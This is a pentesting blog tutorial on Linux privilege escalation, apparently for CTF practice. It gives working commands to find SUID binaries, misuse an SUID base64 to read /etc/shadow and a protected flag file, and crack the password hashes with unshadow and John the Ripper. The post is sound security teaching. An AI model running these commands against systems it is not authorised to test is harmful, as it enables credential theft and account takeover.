đźš© Privilege Escalation Using SUID and GTFOBins

Privilege escalation is a core skill for penetration testers and ethical hackers. One common vector involves SUID (Set-user Identification) binaries. In this guide, I’ll walk you through escalating privileges by leveraging SUID files and the GTFOBins database, with practical examples—just like you’d do in a CTF or penetration test.
🛡️ What is SUID?
Linux permissions go beyond read, write, and execute. The SUID (Set-user Identification) bit, when set on an executable, allows users to execute the file with the permissions of the file owner (often root). That means, if misconfigured, SUID binaries can let us perform actions as root!
🧑‍💻 Finding SUID Binaries
Let's start by searching for files with the SUID bit set.
find / -type f -perm -04000 -ls 2>/dev/null
-type f
: look for files only-perm -04000
: find files with the SUID bit set2>/dev/null
: suppress permission errors
Tip: Compare your results to GTFOBins SUID List to spot potential exploitation vectors.
🛠️ Example: Exploiting SUID with Base64
Suppose you spot base64 as an SUID binary. According to GTFOBins, you can leverage it to read files you don’t normally have permission for, such as /etc/shadow
.
1. Try Reading /etc/shadow
cat /etc/shadow
You'll likely see a Permission Denied error.
2. Use SUID Base64 to Read the File
Let’s trick the system by using base64
to read and decode the file contents.
lfile=/etc/shadow
base64 "$lfile" | base64 --decode
lfile
is just a variable (you can name it anything)This command base64-encodes the file, then immediately decodes it back—effectively bypassing restrictions.
đź’ˇ Copy the output and save the relevant user's password hash for later cracking.
đź§© Cracking a User's Password
Now, let's extract and crack a user's password using john
the ripper.
1. Extract Password Hash
Open a new file with
nano
and paste the password hash line you copied from/etc/shadow
:nano user2.txt
Copy the relevant username line from
/etc/passwd
into another file:nano user2.txt
2. Combine with unshadow
Combine both files to make a file suitable for password cracking:
unshadow user.txt user2.txt > userpassword
3. Crack with John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt userpassword
To see cracked passwords after some time:
john --show userpassword
🎯 Finding and Reading the Final Flag
Suppose you need to find a flag file (flag3.txt
):
find / -name flag3.txt 2>/dev/null
If you try to cat
the file and get Permission Denied, use SUID base64
again:
flag=/home/ubuntu/flag3.txt
base64 "$flag" | base64 --decode
📝 Key Takeaways
SUID binaries can be dangerous if misconfigured—always check them during a penetration test.
Use GTFOBins as your go-to resource for finding ways to exploit these binaries.
Base64 is just one example—there are many more, so always cross-reference your SUID findings.
đź’ˇ Final Notes
Always have permission before testing these techniques!
Responsible disclosure is crucial—report any findings to the system owner.
đź”— References
GTFOBins SUID
John the Ripper
Linux SUID Exploitation Explained
If you found this guide useful, follow me for more practical pentesting tips! Got questions or want a deeper dive into privilege escalation? Drop a comment below.
#Linux #Cybersecurity #PrivilegeEscalation #GTFOBins #EthicalHacking #PenTest #SUID #RedTeam #CTF
Subscribe to my newsletter
Read articles from praveen magar directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by

praveen magar
praveen magar
Master of Computer Science(Texas College of Management and IT) || Aspiring Security Analyst || Information Technology Graduate || CYBER SECURITY || CEH (Master) || Lecturer and Researcher at University